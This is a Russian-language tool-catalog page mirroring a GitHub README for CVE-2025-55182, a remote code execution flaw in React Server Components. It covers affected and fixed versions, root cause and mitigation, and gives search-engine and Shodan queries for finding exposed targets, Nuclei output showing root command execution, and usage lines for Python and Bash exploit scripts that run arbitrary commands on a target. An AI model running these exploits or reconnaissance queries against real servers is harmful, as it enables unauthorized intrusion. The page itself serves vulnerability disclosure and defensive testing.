Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Критическая уязвимость удаленного выполнения кода (RCE), затрагивающая реализацию серверных компонентов React (RSC) в нескольких пакетах, включая. | Kitploit
Инструменты/GitHubGitHub/cyberleelawat/cve-2025-55182
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

Критическая уязвимость удаленного выполнения кода (RCE), затрагивающая реализацию серверных компонентов React (RSC) в нескольких пакетах, включая.

112 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 – Удаленное выполнение кода в React Server Components

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

Создано: Virendra Kumar

Компания: Cyber Leelawat

Веб-сайт:

www.cyberleelawat.in

Обзор

CVE-2025-55182 — это критическая уязвимость удаленного выполнения кода (RCE), затрагивающая реализацию React Server Components (RSC) в нескольких пакетах, включая:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

Уязвимость существует из-за небезопасной десериализации полезных нагрузок, отправляемых через внутренний протокол Flight, используемый RSC. Когда определенные недоверенные входные данные поступают через React Server Components по HTTP-запросам, может быть запущено выполнение кода на стороне сервера.

Затронутые версии:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

Исправленные версии:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Как работает уязвимость (общий уровень)

React Server Components принимают клиентские запросы, которые анализируются и десериализуются на бэкенде. Уязвимость возникает из-за недостаточного контроля над десериализацией входящих данных, что позволяет специально сформированным полезным нагрузкам интерпретироваться как исполняемые серверные компоненты.

Когда это происходит, на сервере может быть выполнено произвольное JavaScript, что может привести к полной компрометации сервера в зависимости от среды хостинга и привилегий.


Причина

  • Отсутствие надлежащей проверки входных данных в потоках протокола Flight RSC.
  • Неправильное предположение о безопасности границы доверия сервера.
  • Небезопасная серверная обработка недоверенного пользовательского ввода.

Воздействие

Если уязвимость будет использована, злоумышленник может:

  • Достичь удаленного выполнения кода
  • Выполнять произвольные серверные команды
  • Получить доступ к базе данных или ресурсам на уровне ОС
  • Установить вредоносное ПО или бэкдоры
  • Похитить конфиденциальные данные
  • Выполнить боковое перемещение внутри инфраструктуры

Оценка CVSS: 10.0 – КРИТИЧЕСКИЙ


Ручное тестирование (безопасная идентификация защиты)

Основная цель:

Проверить, использует ли приложение React Server Components и используются ли затронутые версии.

Шаг 1 — Проверка наличия RSC по характеристикам ответа

root@kitploit:~
curl -I https://target.com/?__rsc=1

Разведка через Google (оборонительные ключевые слова)

Эти ключевые слова помогают определить, ссылается ли публично доступный репозиторий или веб-приложение на компоненты RSC.

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

Проверьте:

  • Присутствуют ли функции RSC?
  • Видны ли пакеты во фронтенд-бандлах?
  • Публичные Git-ссылки?

Примеры внутренних запросов Google (только для вашего домена)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

Предназначено только для внутреннего аудита вашего собственного домена.


Shodan (безопасное определение технологий)

Проверка использования открытых фреймворков, а не эксплуатации уязвимости.

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

FOFA (только классификация технологий)

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

Автоматическое тестирование (внутреннее / лабораторное)

Для автоматизации защитного сканирования клонируйте шаблонную логику обнаружения для оценки собственной инфраструктуры:

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Шаблон Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Эксплойт RCE на Python (CVE-2025-55182.py)

Полнофункциональный скрипт эксплойта RCE, который выполняет произвольные команды и извлекает вывод.

Использование:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Эксплойт на Bash

Установка

root@kitploit:~
chmod +x scanner.sh

Использование

root@kitploit:~
# Сканирование с командой по умолчанию (id)
./scanner.sh -d example.com

# Выполнение произвольной команды
./scanner.sh -d example.com -c "whoami"

# С полным URL
./scanner.sh -d https://example.com -c "uname -a"

Параметры

  • -d, --domain — целевой домен/URL (обязательно)
  • -c, --command — команда для выполнения (по умолчанию: id)

Примеры

root@kitploit:~
# Проверить уязвимость цели
./scanner.sh -d vulnerable-app.com

# Получить информацию о системе
./scanner.sh -d vulnerable-app.com -c "uname -a"

# Вывести список файлов
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

Требования

  • Bash
  • curl
  • openssl

Благодарности: скрипты Bash и Python изначально созданы @zack0x01 и @sickwell. Используются с признательностью.

Шаблоны в репозитории предназначены для:

  • идентификации версий
  • проверки видимости
  • инвентаризации инфраструктуры
  • повышения осведомленности об уязвимостях

ВАЖНО: Эти шаблоны должны выполняться только на системах, которые вам принадлежат или на которые у вас есть разрешение на оценку.


Nuclei (Оборонительное заявление об использовании)

Шаблоны Nuclei, включенные в этот репозиторий, предназначены исключительно для:

  • проверки версий зависимостей
  • косвенного снятия отпечатков
  • пассивных проверок
  • внутреннего аудита безопасности

Пожалуйста, убедитесь, что:

  • у вас есть письменное разрешение
  • вы сканируете только свои собственные активы
  • вы соблюдаете местные законы и политику

Рекомендуемые меры по смягчению

Немедленно обновитесь

Обновитесь до одной из исправленных версий:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Если вы не можете сразу установить патч

  • временно отключите функции RSC
  • изолируйте серверные компоненты
  • внедрите правила WAF
  • ограничьте открытую сетевую поверхность

🤝 Свяжитесь со мной

👨‍💻 Cyber Leelawat

Исследователь безопасности • Тренер по кибербезопасности • Хантер за багами

Девиз: Полная безопасность с нулевым доверием 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

Заключение

CVE-2025-55182 в настоящее время является одной из самых критических угроз для инфраструктур на основе React. Из-за тривиального вектора эксплуатации и неаутентифицированной поверхности атаки настоятельно рекомендуется немедленное исправление. Любая организация, использующая затронутые версии RSC, должна рассматривать это как аварийный приоритет.


Правовое / этическое уведомление

Этот репозиторий и документация предназначены для защитных исследований и проверки безопасности активов, которыми вы владеете. Любое неправильное использование может быть незаконным. Вы несете ответственность за соблюдение законов и политики организации.

Сделано с ❤️ от Cyber Leelawat

Полная безопасность с нулевым доверием 🎯🔐

Скачать инструмент